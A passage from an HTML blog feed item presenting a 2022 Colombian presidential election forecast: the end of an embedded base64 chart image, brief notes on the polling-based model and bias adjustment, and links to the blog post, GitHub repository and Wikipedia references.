tIWyxtvvFHGjBkj99xzj0ybNk1q1aolv/76qy7i0Ucf1dPzb7/9tlYw58yZI23bttVx559/vqAN5557rowYMUK7BixSCzq7du0qF198ccA66W4LlF0onbCuQrncb7/9dHlQhIcNGyYLFy4U+Ie+/PLL8sILL2ilGK4BF154oRx++OHy0UcfaSUZ6SF3v379NJPPP/9cxx955JHy1VdfyTHHHOOuNimPo1JAYa52B0ACSD8FmM7R6VWrVvWT2Fpe+K14x0A8IJgvm2jqylCJ0Ue27cVYZggmcOyzTwVH8CxpCeTl5VmP9XBCYFoPiyFs75lw5aRiPL7X/Sh3qvVV3bp19VSzaffatWvl2Wef1afYXeT//u//tOJnrns/oTDib8iQIXLSSSfJOeec400ie+21l9x8883y+OOPa8vjjz/+qK2l0HXwnnooibBCfvDBB1pJnTlzplaIjTW0ZcuWevp87Nix2irprQAKLn5L8/PzdVuhQCJAscRvFqyfCFBsoXA/8cQT+tz9n1m4hPsVSjQUawSMY7gnQFlOOwUUPhAmwA8CTrTbt283Ub74hDKEpyzI7qeAgY7B7R4D8ZK/PKzxPAxfGdv2Ii0DCaQqAXwP2471cDJCiYUSWtFywpWfzPHpKrfbXzGZ+du2DdPn8JucPn26nqo20+PID4XSBPxeYSodYdOmTSZaWwt79eolo0aN0ivSMVUOhdAdMNUOxRRW0auvvlovdEJ6hAsuuEDvYoJ24K9JkybaIIVpfugFxiCHe8jU7y4bx1CY8VvqDTBswbJ6+eWXey+VOnf3a7NmzYL0EfiMhqu7VEEJjihNIUKDANkdAMwb576ejseQGQPNb3JD5kT1N+ouT4imveWtozztYh4SiDWBWHwn4X5B8Nt3G2SO5rsC6RkSQwAWwocfflhOOOEEbYGEEojx+uWXX+opdVj/EGApnTFjhl5AhBXmJpxyyilyySWXyHnnnaf9N+G3CeMDDEtQ3BBg8TzqqKP0qnrcVw899JBOg2vt27eXevXqyb333ivw10TAavwOHTpopRa+o1CO8Ye2RRPQ9jvvvFO3GQuZsGXTxx9/rOV0t89bZp8+fbRV9ogjjtAGwQ8//FBbeb3pkvE8KgU0GQVgm0iABEiABEiABPxBAFsSYe9PKJLwt4T1v5XyV4ev5tlnn60hYIoc0+WYDsfq8vr16+t4WDWvuuoque+++/QiJSw6gvUbK8xheYQVdeDAgXoREvYWxaryHmrLp+HDhwfgwhfz1ltv1QuBTOQDDzygraZYmY9V9pgCh2IaTUAbr7/+ej19b1bAv/TSS7oItOWKK64IKMnucvv27aun79u0aaMtn5DBxorqLiNRx1RAE0We9ZIACZAACZAACURNAH6S+MO2SZj2hj+lO0D5PPPMM7XChgVFJmCV+G+//SbwHa1du3ZgmyYofFhhD3cvWBuxQAlbOcGSiun8//73v6YI7beJBUbuACUV2yJ5t2Vyp2ncuLG2tLvjvMewqmKFP9wGsI2UCddcc41eAAULMPxH3QEWWexjiv1R4UaDNKkSgiVJlVaznSRAApVO4D/vvCud/5pd6fWwAhIgARIoDwFsX+RVPk05UMTcyqeJxycUS68ih3MonyZAsYPyGU0we41Gk8ebFv6hbuXTXEfbvG021/AJhTqVlE+0mQooKDCQAAmUInDjsLdlX7UPHQMJkAAJkAAJxJoAFdBYE2V5JEACJEACJEACJEACEQnQBzQiHl4kARIgARIgARLwEihetVoKfp3sjS73eYnyYZS6//o9lrsgZkwZAlRAU6ar2FASIAESIAESSDwBvH5mx+RJ+i+WrclQi4QY/EOACqh/+pqSkgAJkAAJkECFCXyhXvtYnheElFUxtldi8A8BKqD+6WtKSgJREej55OOyrME/++dFlZGJSYAE0poA9tdkIIGKEqACWlGCzE8CaUpgets2aSoZxSIBEiABEkg0ASqgie4B1l8pBLaq16uNGTNGFi5caFX+zJkz9StWrRIzEQmQAAmQAAmQQIUIUAGtED5mTlYCeIfv6nnzZPbKFVZNXLh+Q5lvqbAqiIlIgARIgARIgATKJEAFtExETJCqBC7ara3c1nkvq+af9OXX8uPKVVZpmYgESIAESIAESKBiBLgRfcX4MTcJpC2BJurdyHnbtqWtfBSMBEiABEggcQSogCaOPWsmgaQm8PMFF8uZY79K6jaycSRAAiRAAqlJgApoavYbW00CJEACJEACJEACKUuACmjKdh0bTgIkQAIkQAIkQAKpSYAKaGr2G1tNAiRAAiRAAiRAAilLgKvgU7brkqPhM2bMkIEDB0bdmO7du0vfvn2jzscMJEACJEACJEACqU+ACmjq92FCJVi5cqV8/PHHsnf9epKTlWXVlqlr1krNmjWpgFrRSlyi147vJTNbtUpcA1gzCZAACZBA2hKgApq2XRtfwV475CBpU7OGVaVdPxljlY6JEkvgrssvTWwDWDsJkAAJkEDaEqACmrZdS8FIgATSnUDR8uVaxD59+kQl6uGHHy7Dhg2LKg8TkwAJkEAsCVABjSVNlkUCJEACCSBQ7fgTJbt5c6uat3462iodE5EACZBAZRKISgHNzc0Nakt2drZ444ISpOFJlSpVJEv5OmZkZKShdOFFQl9DZm9/V61aNXymsFcyJJqxA+YMJEAC4QnkdjtIqnbeO3wC15WCX37R32HeezncPe7KmraHmZmZpb7b0lZYCkYCSUIgKgW0Tp06Qc3Oz88X/DH4h4B3DNSoYef36SYE1T0nJ0e8ZbnTuI85xtw0eEwCFSeAh7pw91+4+IrXmtwllO9hOrllYutIIJkJRKWA/v333wFZGjduLBs2bJBtPntXdF5enhQXF0tBQUGRuDpBAAAd60lEQVSAhR8OqlevLpAdq97dYe3ate5Tq2NHHNm6dau4x1OkjBhnDPEnMOzue+X1Xj3liwMPiH/lrLFSCeD7y3v/GYOC9x6v1IYkSeG1a9eW9evXJ0lrYtcM/E4zkECyEohKAXUcp5QcoeJKJUqjCMhr/tJIrDJFMTJ7+9t7XmZBKsGKLVtl3LhxcsEFF9gklyVLllilY6LYEjj0tykytut+sS2UpSUFAXM/h2pMee7pUOWkWpxf5U61fmJ704dAVApo+ohNSRJJoEBZkHNXr5Ztv0+xasaqNLRMWAnORCRAAiRAAiSQpgSogKZpxya7WL1aNJOnDtzfqplX/vCTvDFnnlVaJiIBEogtAVgG4TID1yPbgAWL1apV04sNbfMwHQmQgL8IUAH1V39TWhIgARKIisCECRMk2n1GUcFZZ50lTzzxRFR1MTEJkIB/CFAB9U9fU1ISiIrA9pyqUmT5etWoCmbilCSQ37efZNata9X2rW+/ZZWOiUiABPxLgAqof/uekpNARALtPngv4nVe9BeB3EO6S3aLllZCF47hZvdWoJiIBHxMINPHslN0EiABEiABEiABEiCBBBCgApoA6KySBEiABEiABEiABPxMgFPwfu59yk4CJOA7AkXLlsj4qaulY8eOQbJj5Tr+SkpKguILCwuDznlCAiRAArEgQAU0FhRZBgmQAAmkCAFHvQiiqFqebG7dxqrFRSuWi2zaZJWWiUiABEjAlgAVUFtSTEcCPiPQ+7vvZVqbXWV+s2Y+kzz9xa3Srp3Uufd+K0G3DP9QNr/6klVaJiIBEiABWwL0AbUlxXQk4DMCzz36uPT49TefSU1xSYAESIAE4kGACmg8KLMOEiABEiABEiABEiCBAAEqoAEUPCABEiABEiABEiABEogHASqg8aDMOkiABEiABEiABEiABAIEqIAGUPCABEiABEiABEiABEggHgS4Cj4elFkHCaQggQE33SDT29pt1ZOC4rHJlUhgx8qV8uHw4fLpmDHWtTRv3lw+HjFC8vPzrfMwIQmQQOoSoAKaun3HlpNApRIYdWj3Si2fhacvAaeoSIpr1ZaCtm2thCxetUr+mDFDilQ+BhIgAX8QoALqj36mlCRAAiQQVwJVO+8ttf5znVWd2775WjY+/qhVWiYiARJIDwL0AU2PfqQUJEACJEACJEACJJAyBKiApkxXsaEkQAIkQAIkQAIkkB4EqICmRz9SChIgARIgARIgARJIGQJUQFOmq9hQEogvgdmn9ZH+n9qvYo5v61gbCZAACZBAKhOgAprKvce2k0AlEsjdsUOyi4srsQYWTQIkQAIk4FcCUa2Cz8vLC+JUtWrVoHM/nEDmkpISycrK8oO4ARmrVKkiGRkZ4h0Dubm5gTQ8IAESIIGKEKhWrVqp75iKlGebF9/n3u8227xMRwIkUD4CUSmgxR5rCBQxb1z5mpE6uSCzH+V2HEd3kre/wYKBBEiABGJBIFHfrfh+8363xUIelkECJBCeQFQKaEFBQVBJ2DTYGxeUIA1P8KSMLyq/yQ0LKKy/Xrl3qGlaBhIgARKIBQF8v3i/Y2JRblllwPqZiHrLahevk0A6E6APaDr3LmUjgQoQ+HaffWRpgwYVKIFZSYAESIAESCA0gagsoKGLYCwJkEA6Euh3/z3pKBZlIgESIAESSAICVECToBOSqQkjR46UJUuWlGoSpt/xt3nz5qBrc+fODTrnCQmQAAnEg8DAgQNl4sSJUVXVsWNHueWWW6LKw8QkQAKVQ4AKaOVwTdlSh735poyfMF5ysuyGRmEJt+lJ2c5mw0kghQkMfP552bhxo0impSeZWjD57XffUQFN4T5n09OLgJ2WkV4yU5oyCPRq3kzeOfywMlL9c/nRqdPl/ilTrdIyEQmQAAnEikBWdrbkn95Hqvc/z6rILcM/kIJhQ63SMhEJkEDlE7B8dKz8hrAGEiABEiABEiABEiABfxCgAuqPfqaUJBA1gQcHvSjdpk2LOh8zkAAJkAAJkEBZBDgFXxYhXicBnxI4V70Hfo5yx/hxr718SoBix4uAs3M/4QkTJkh+fr5VtdiHmoEESCB1CVABTd2+Y8tJgARIIC0IFM2Zo+W4+OKL7eVRLwWxU1Xti2RKEiCB+BGgAho/1qyJBEiABEggAoFat90pGbm5EVL8e2n9A/f+e8IjEiCBlCNABTTluowNJgESIIH0JFC1U2fJrF49PYWjVCRAAkEEuAgpCAdPSIAESIAESIAESIAEKpsALaCVTZjlk0CKEtjvtVdkY35eiraezSYBEiABEkhmAlRAk7l32DYSSCCBFfXqJrB2Vk0CJEACJJDOBDgFn869S9lIgARIgARIgARIIAkJ0AKaoE4pLi6Wv/76K+raq1WrJq1atbLKt337dpk/f75VWpNoy5YtUtOc8JMESIAESIAESIAEKoEAFdBKgGpT5Pr16+XII4+0SRqUZu/OneXTMWOC4sKdzJs3T4466qhwl0PGZ6jYJi2ahbzGSBIgARIgARIgARKIBQEqoLGgWIEybuvUUbo3bmRVwmPTZshax7FK6070aNcusmed2u6osMdnjvsu7DVe8BeBTrPnyNIG9WVNbbux4y86lJYESIAESKAiBKiAVoSeK++4ceNk4sSJrpjIh1u3btUJOtSuZa2APjhlqiz7+2955JFHIhe+8+rq1av10V5168jBjRpa5cnOgA2UgQRERl9/o9x96cXy6oknEAcJ+JLALbfcIjNnzoxK9sMOO0xuuOGGqPIwMQn4kQAV0Bj1Ot5hPGjQIGmQV82qxKKS6C2ZS5XSumbLVnnn5Zes6theVGyVjolIgARIgASCCThqtmno0KH6zUwZVaoGXwxzVlKwXRYtXUoFNAwfRpOAmwAVUDeNCh43rZ4vf57S26qUP9dvkK4jR1uldSeCNfP7449zR4U9HrFwofT/dkLY67xAAiRAAiQQmkDGztmg6uddKHknnBg6kSd208uDJeuXSZ5YnpIACYQikHAFdOzYsXLXHXeIROPbqL4Y+p93ngwYMCCUTKXi3n33XXnqiSeiruPa66+XM888s1R5jCABEiABEkgtAoWzZkmh2n2kRevWpRoOx6Po56RKFSOo42/lJhWqjtKp/4nJy82VF9XsWY8ePcIlYTwJpCWBhCug2PZn4eLFcmG7tpKbnWUF+fU582TdunVWaZFow4YNuo4Bu7e3zvP8zFmyceNG6/RMSAIkQAIkkLwEnB0FIiUlknNsT+tGbh05wjotEjo7dohkZ0vOMXazVI7aKm/TF5+JWRMQVWVMTAIpTiAqBbRKlSpB4mZlZYk3LiiBxQnKQNijTi2pkR1cfrjsWepxdZZ60hw+fHi4JEHxU6dO1eed69QJii/rBPm8dUBe+AYVFRUFZceenlt2FMpbSjm2Ccu3/bMIafyKlWLrq7mpsEiKle+obR2T16zRTRm7dJks3LTZpllSoCwEizdvsa7j97VrdbmjFi2WhupJ3iYUqTpmb9hoXcecjZt0se/NXyA5mXbvTihRfTRt7TrrOpZv3SZoly3b7Sotws+rVlu3ab36AUQ+2zrmbPrnAehbZVFZV6B+PC3CVjUuV27bZl3HxFWrdKlFixaVmiF4pOex8rPyaS6c7dmv1ikRZ/Om0vFh2lei+gGhaP48KVn7z5gMkzQQjXusZP06+zp2ju8itDWKhXTFa1bZ17Ftu4jqv1I8Aq0OPijeeW8Uq/6zzaMVGKUk2aYvXrZMV1q0dIlk5Fm+NrW4SBz14G9dx+qdY0S59EBhsgqq/5yNG6zrKNmw/h855s6xl0PlAGNbOUqUzKK+P3J7HG4nguoHKKDFq1Za1+EoH9CMnFzrOkqUcWSbUkBj8VtqJRQTkUASEchQX/SxmHkot0iYHj/rrLPKnZ8ZSYAE4k0gVhOWEdoNJTKxX00RGsdLZRKIR//Fo44yBY1Ngg8//FBOPfXU2BTGUkggRQhEpYCabX0gW/369WXz5s2Ct+1UJGAqHSvIMU1uGwoLC3XddSwtmphKr1q1quRaWujQDsi1Q02n1KxZM6hZsICWqCdjvMnIHSBHjRo11OyLnVEZ+Zeq1ZL16tWT/Px8d1Fhj1cpaxUsr02aNAmbxn0B7Yc/UsOGDa1lX7FihTIgZeg87rLAD7LDZcIdtilrG8ZF48aNra3hy5TVJicnR8vuLivc8aZNm2StsnS0aNFCGTDsLKBLliyR6tWrS23LPSwx/jBOUIc3YNx4xzme2xYpqyHGoHeMePObc8gAXs2a2W30j74GK9xreZbWLYwRjC30h00oUJZVtKmzesEB3rLlDrVq1dLXMI7cYaGyhGGc28qB/sNYb9u2rfX9MXfuXH0/YezaBNx/GLsdOnSwSa7TYBYFbHEPuoOZ1cH3jDuALV4g0a5dO3d02GP0w+zZs6Vp06bWY2T58uWCPmnVqlXYct0XkBZvO2vZsqX1GFmsXJ5wjzdv3txdlL4ncV96XY9wzyNPa+U7ies2YcECNVuh0tp+V6FOjHWwNbNiZdUDtri/GzRoUFZSfX2NmhHCd1X79qVdsXB/hZoG//PPP6VRo0b6PrepZOXKlYLx3qZNG5vkgTRIb/tdFchkcYDxzUACyUogKgUUX44m4IsFP9qhblqTJh0/8UWFHxZ88fspQJmD7PiC9VuAkhmNz3G68IESC8XAb/c4FHE8YHgfOtKlX8PJgXscD8NQ5P0W0vUet30A8Ft/U97kIGBnTkqOtrIVJEACJEACJEACJEACaUCACmgadCJFIAESIAESIAESIIFUIkAFNJV6i20lgTgSKO7cVbLe/zCONbIqEiABEiABvxCgAuqXnqacJBAtgenTJWPnFkrRZmV6EiABEiABEohEgApoJDq8RgIkQAIkQAIkQAIkEHMCVEBjjpQFkgAJkAAJkAAJkAAJRCJABTQSHV4jARIgARIgARIgARKIOQG7XdN3VuveIBibU2OvPHdczFuXhAVCZmzi7Ee5sTG63+TGEMS+r36U2zm0u5Q0beJL2dHvfutzvGADm+/7TW4/3+OQnYEEEkUgqo3oE9VI1ksCJEACJEACJEACJJA+BDgFnz59SUlIgARIgARIgARIICUIUAFNiW5iI0mABEiABEiABEggfQhQAU2fvqQkJEACJEACJEACJJASBKiApkQ3sZEkQAIkQAIkQAIkkD4EqICmT19SEhIgARIgARIgARJICQJUQFOim9hIEiABEiABEiABEkgfAlRA06cvKQkJkAAJkAAJkAAJpAQBKqAp0U1sJAmQAAmQAAmQAAmkDwEqoOnTl5SEBEiABEiABEiABFKCABXQlOgmNpIESIAESIAESIAE0ocAFdD06UtKQgKlCEyZMkXGjRtXKr68Edu2bSuVtaCgQAYPHizFxcVB1yZMmCCTJk0KiivrZO7cufLll1+WlUxCtaOsTCgX5Ucbpk6dKh988IFs2bIlKOv27dtl1KhRMnr0aNmxY0fQtXB5kG7MmDHy/fffi+M4QXm8J7/++qsMGzZMli9fHnQJso8cOVI++eSTUvUGJdx58ssvv8jMmTNDXRLUgb+Khg0bNsibb74p999/v7z11luyfv36ihZZ6flXr16txy3aXlaIdrwh/fPPPy8PP/xwyKKXLFkiQ4cOlSeffFJmzZoVMk1ZkeUdz2WVy+skEC8CVEDjRZr1kEACCEDZeeWVV2JS87XXXquVJ29hmzdvlssuu0wKCwuDLkERGT58eFBcWSc///yzvPDCCxGToZ6OHTtGTBPq4qBBg6JWiI899li57bbbBEpc586d5YsvvtBFQxnt1KmTVkyhZBx//PEBhTJcnoULF0rbtm21wjpkyBDZfffdwyrSV199tWb6zTffyL777htQUsD6wAMP1AoolNA99thDoAiHC3/88Yccd9xxAq7eAAUM7YYCXZGwatUq2X///eX999+XkpISrYjut99+snjx4ooUW+l5X3rpJbnzzjvl1VdfjVhXuHEfKRPGxBtvvCGNGjUqleydd96Rrl27ynfffSdr166VU045RQYMGFAqXVkR5RnPZZXJ6yQQTwJUQONJm3WRQJIRWLFihcBat2nTpqCWrVu3LigeFh0oMxs3bhRYPKMNa9as0QranDlzBEqUN6AdXksf0kDRmzZtmixbtiyQBYrTggULBIqPCVDCpk+frttn4szn7NmzZevWreZUf0LeUO1wJ/rxxx9l6dKlWkF75JFHBH+PP/64TvLEE09oxe7111+X8ePH67I+//xziZTn6aeflosuukgGDhyolRMotFDSvQHWyhEjRsjEiRMFiupNN90k//vf/3QyWJqh3EF5wvG5556rlWNvGTh/8cUX5eijj5Z69eqFuiyXXHKJNG7cOOS1aCKhCLds2VI+/vhjuffee+XTTz/VyjUsou6wcuXKIKUUDxJuSynGFcYXAvoG5/PmzQt6sFm0aJF4LZbh+h7jxPtQ5G4PHszQn94HHoxV5EPdNuPeKxfajnulT58++s9d5+TJk+Xyyy/XsxLo2wceeECPHzyoQSF1B4xbw8Mb7x3PuB6Ogzsvj0kgmQhQAU2m3mBbSCBOBIqKiuTkk0+Wnj17yg033CAtWrTQU7qoHkpRly5d5O6779aKBM5hJcN0/jPPPCM//PBD1K2EsgXLICylu+22m1bCTCEXX3yxtqAdddRRAiXNBChYsHTecccdss8+++i8uPbgg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" alt="2022 Colombian Election Forecast"/><!-- --></p>
</div>
<div id="notes" class="section level2">
<h2>Notes</h2>
<ul>
<li>Polling data was extracted from Wikipedia.<br/>
</li>
<li>A historical spread was measured using past election results(1994-2018).</li>
<li>This model predicts a winner if the election was done today(due to the time effect in opinion polls).</li>
<li>A general bias term of 5.3% was added using past election and polling results(1994-2018).</li>
</ul>
</div>
<div id="blog" class="section level2">
<h2>Blog</h2>
<ul>
<li><a href="https://artofcode.tech/who-will-win-the-2022-colombian-election-according-to-statistics/" class="uri">https://artofcode.tech/who-will-win-the-2022-colombian-election-according-to-statistics/</a></li>
</ul>
</div>
<div id="model" class="section level2">
<h2>Model</h2>
<ul>
<li><a href="https://github.com/christianpaez/colombian-election-analysis-2022" class="uri">https://github.com/christianpaez/colombian-election-analysis-2022</a></li>
</ul>
</div>
<div id="references" class="section level2">
<h2>References</h2>
<ul>
<li><a href="https://es.wikipedia.org/wiki/Elecciones_presidenciales_de_Colombia_de_1994" class="uri">https://es.wikipedia.org/wiki/Elecciones_presidenciales_de_Colombia_de_1994</a></li>
<li><a href="https://es.wikipedia.org/wiki/Elecciones_presidenciales_de_Colombia_de_1998" class="uri">https://es.wikipedia.org/wiki/Elecciones_presidenciales_de_Colombia_de_1998</a></li>
<li><a href="https://es.wikipedia.org/wiki/Elecciones_presidenciales_de_Colombia_de_2002" class="uri">https://es.wikipedia.org/wiki/Elecciones_presidenciales_de_Colombia_de_2002</a></li>
<li><a href="https://es.wikipedia.org/wiki/Elecciones_presidenciales_de_Colombia_de_2006" class="uri">https://es.wikipedia.org/wiki/Elecciones_presidenciales_de_Colombia_de_2006</a></li>
<li><a href="https://es.wikipedia.org/wiki/Elecciones_presidenciales_de_Colombia_de_2010" class="uri">https://es.wikipedia.org/wiki/Elecciones_presidenciales_de_Colombia_de_2010</a></li>
<li><a href="https://es.wikipedia.org/wiki/Elecciones_presidenciales_de_Colombia_de_2014" class="uri">https://es.wikipedia.org/wiki/Elecciones_presidenciales_de_Colombia_de_2014</a></li>
<li><a href="https://es.wikipedia.org/wiki/Elecciones_presidenciales_de_Colombia_de_2018" class="uri">https://es.wikipedia.org/wiki/Elecciones_presidenciales_de_Colombia_de_2018</a></li>
<li><a href="https://es.wikipedia.org/wiki/Anexo:Sondeos_de_intención_de_voto_para_las_elecciones_presidenciales_de_Colombia_de_2022" class="uri">https://es.wikipedia.org/wiki/Anexo:Sondeos_de_intención_de_voto_para_las_elecciones_presidenciales_de_Colombia_de_2022</a></li>
</ul>
</div>
<!-- code folding -->
<!-- dynamically load mathjax for compatibility with self-contained -->
<script>
(function () {
var script = document.createElement("script");
script.type = "text/javascript";
script.src = "https://mathjax.rstudio.com/latest/MathJax.js?config=TeX-AMS-MML_HTMLorMML";
document.getElementsByTagName("head")[0].appendChild(script);
})();
</script>
</body><!--kg-card-end: html-->]]></content:encoded></item></channel></rss>